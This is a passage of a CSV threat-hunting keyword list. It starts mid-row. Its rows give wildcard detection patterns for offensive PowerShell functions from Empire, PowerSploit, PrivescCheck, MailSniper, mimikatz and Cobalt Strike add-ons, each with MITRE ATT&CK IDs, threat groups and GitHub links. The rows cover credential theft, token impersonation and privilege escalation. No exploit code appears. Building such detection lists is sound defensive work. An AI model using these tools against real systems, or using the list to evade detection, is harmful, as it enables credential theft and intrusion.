TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" +"*Invoke-ThirdPartyDriversCheck*","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","0","N/A","N/A","10","2254","370","2023-09-03T15:14:46Z","2020-01-16T12:28:10Z" +"*Invoke-ThreadedFunction*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","HTTP-Login.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Invoke-Thunderfox*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1260","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" +"*Invoke-TmpDavFS*","offensive_tool_keyword","Invoke-TmpDavFS","Memory Backed Powershell WebDav Server - Creates a memory backed webdav server using powershell that can be mounted as a filesystem. 
Note: Mounting the remote filesystem on windows implies local caching of accessed files in the C:\Windows\ServiceProfiles\LocalService\AppData\Local\Temp\TfsStore\Tfs_DAV system directory.","T1020 - T1059 - T1573 - T1210","TA0002 - TA0011 - TA0008","N/A","N/A","POST Exploitation tools","https://github.com/p3nt4/Invoke-TmpDavFS","1","0","N/A","N/A","2","132","27","2021-03-07T19:07:39Z","2018-07-01T13:21:11Z" +"*Invoke-TokenManipulation*","offensive_tool_keyword","AD exploitation cheat sheet","Invoke-TokenManipulation script Tokens can be impersonated from other users with a session/running processes on the machine. Most C2 frameworks have functionality for this built-in (such as the Steal Token functionality in Cobalt Strike)","T1110","TA0006","N/A","N/A","Credential Access","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*Invoke-TokenManipulation*","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","10981","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" +"*Invoke-TokenManipulation.ps1*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1058","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Invoke-Tokenvator*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1260","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" +"*Invoke-UacCheck*","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - 
TA0008","N/A","N/A","Frameworks","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","1009","830","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z" +"*Invoke-UacCheck*","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","2254","370","2023-09-03T15:14:46Z","2020-01-16T12:28:10Z" +"*Invoke-UdpEndpointsCheck*","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","2254","370","2023-09-03T15:14:46Z","2020-01-16T12:28:10Z" +"*Invoke-UnattendFilesCheck*","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Frameworks","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","1009","830","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z" +"*Invoke-UnattendFilesCheck*","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","2254","370","2023-09-03T15:14:46Z","2020-01-16T12:28:10Z" +"*Invoke-UpdateMimikatzScript.ps1*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. 
pass-the-ticket or build Golden tickets","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/g4uss47/Invoke-Mimikatz","1","1","N/A","10","1","24","6","2023-03-02T22:59:52Z","2020-09-22T16:47:19Z" +"*Invoke-UrbanBishop*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1260","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" +"*invoke-urlcheck -urls*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*Invoke-UserCheck*","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","2254","370","2023-09-03T15:14:46Z","2020-01-16T12:28:10Z" +"*Invoke-UserEnvCheck*","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script 
for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","0","N/A","N/A","10","2254","370","2023-09-03T15:14:46Z","2020-01-16T12:28:10Z" +"*Invoke-UserGroupsCheck*","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","0","N/A","N/A","10","2254","370","2023-09-03T15:14:46Z","2020-01-16T12:28:10Z" +"*Invoke-UserHunter -CheckAccess*","greyware_tool_keyword","powershell","Check local admin access for the current user where the targets are found","T1078.003 - T1046 - T1087.001","TA0002 - TA0007 - TA0040","N/A","N/A","AD Enumeration","https://hideandsec.sh/books/cheatsheets-82c/page/active-directory","1","0","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*invokeuserhunter*","offensive_tool_keyword","cobaltstrike","PowerView menu for Cobalt Strike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 
APT29","C2","https://github.com/tevora-threat/aggressor-powerview","1","1","N/A","10","10","60","17","2018-03-22T00:21:57Z","2018-03-22T00:21:13Z" +"*Invoke-UserHunter*","offensive_tool_keyword","cobaltstrike","PowerView menu for Cobalt Strike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/tevora-threat/aggressor-powerview","1","1","N/A","10","10","60","17","2018-03-22T00:21:57Z","2018-03-22T00:21:13Z" +"*Invoke-UserHunter*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","powerview.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Invoke-UserHunter*","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. 
PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","10981","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" +"*invoke-userhunter*","offensive_tool_keyword","pywerview","A partial Python rewriting of PowerSploit PowerView","T1069.002 - T1018 - T1087.001 - T1033 - T1069.001 - T1087.002 - T1016 - T1482","TA0007 - TA0009","N/A","N/A","Reconnaissance","https://github.com/the-useless-one/pywerview","1","1","N/A","N/A","8","738","102","2023-10-02T14:57:20Z","2016-07-06T13:25:09Z" +"*Invoke-UserImpersonation*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Invoke-UsernameHarvestEAS*","offensive_tool_keyword","MailSniper","MailSniper is a penetration testing tool for searching through email in a Microsoft Exchange environment for specific terms (passwords. insider intel. network architecture information. etc.). It can be used as a non-administrative user to search their own email. 
or by an administrator to search the mailboxes of every user in a domain.","T1114 - T1134.002","TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/dafthack/MailSniper/blob/master/MailSniper.ps1","1","1","N/A","N/A","10","2626","554","2022-10-20T08:13:33Z","2016-09-08T00:36:51Z" +"*Invoke-UsernameHarvestGmail*","offensive_tool_keyword","MailSniper","MailSniper is a penetration testing tool for searching through email in a Microsoft Exchange environment for specific terms (passwords. insider intel. network architecture information. etc.). It can be used as a non-administrative user to search their own email. or by an administrator to search the mailboxes of every user in a domain.","T1114 - T1134.002","TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/dafthack/MailSniper/blob/master/MailSniper.ps1","1","1","N/A","N/A","10","2626","554","2022-10-20T08:13:33Z","2016-09-08T00:36:51Z" +"*Invoke-UsernameHarvestOWA*","offensive_tool_keyword","MailSniper","MailSniper is a penetration testing tool for searching through email in a Microsoft Exchange environment for specific terms (passwords. insider intel. network architecture information. etc.). It can be used as a non-administrative user to search their own email. 
or by an administrator to search the mailboxes of every user in a domain.","T1114 - T1134.002","TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/dafthack/MailSniper/blob/master/MailSniper.ps1","1","1","N/A","N/A","10","2626","554","2022-10-20T08:13:33Z","2016-09-08T00:36:51Z" +"*Invoke-UserPrivilegesCheck*","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Frameworks","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","1009","830","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z" +"*Invoke-UserPrivilegesCheck*","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","2254","370","2023-09-03T15:14:46Z","2020-01-16T12:28:10Z" +"*Invoke-UserRestrictedSidsCheck*","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","0","N/A","N/A","10","2254","370","2023-09-03T15:14:46Z","2020-01-16T12:28:10Z" +"*Invoke-UserSessionListCheck*","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","2254","370","2023-09-03T15:14:46Z","2020-01-16T12:28:10Z" +"*Invoke-UsersHomeFolderCheck*","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege 
Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","2254","370","2023-09-03T15:14:46Z","2020-01-16T12:28:10Z"
+"*Invoke-VaultCredCheck*","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Frameworks","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","1009","830","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z"
+"*Invoke-VaultCredCheck*","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","2254","370","2023-09-03T15:14:46Z","2020-01-16T12:28:10Z"
+"*Invoke-VaultListCheck*","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","2254","370","2023-09-03T15:14:46Z","2020-01-16T12:28:10Z"
+"*Invoke-Vnc*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Invoke-Vnc.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z"
+"*Invoke-Vnc.ps1*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1087","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z"
+"*Invoke-VNCServer.ps1*","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Frameworks","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","1009","830","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z"
+"*Invoke-VNCViewer.ps1*","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - 
T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Frameworks","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","1009","830","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z"
+"*Invoke-VoiceTroll.ps1*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1073","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z"
+"*Invoke-Vulmap*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 
- T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z"
+"*Invoke-VulnerableADCSTemplates*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z"
